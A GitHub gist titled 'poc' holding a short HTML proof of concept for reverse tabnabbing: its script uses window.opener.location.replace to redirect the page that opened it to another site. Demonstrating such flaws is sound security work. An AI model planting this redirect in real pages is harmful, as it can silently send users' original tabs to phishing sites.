Skip to content

Instantly share code, notes, and snippets.

@karlosmid
Created April 23, 2016 09:44
Show Gist options
  • Save karlosmid/d6e6440c7b489d738a0e3c9dd5fd425c to your computer and use it in GitHub Desktop.
Save karlosmid/d6e6440c7b489d738a0e3c9dd5fd425c to your computer and use it in GitHub Desktop.
poc
<html>
<h1>Test!</h1>
<script>
window.opener.location.replace("http://www.tentamen.hr");
</script>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment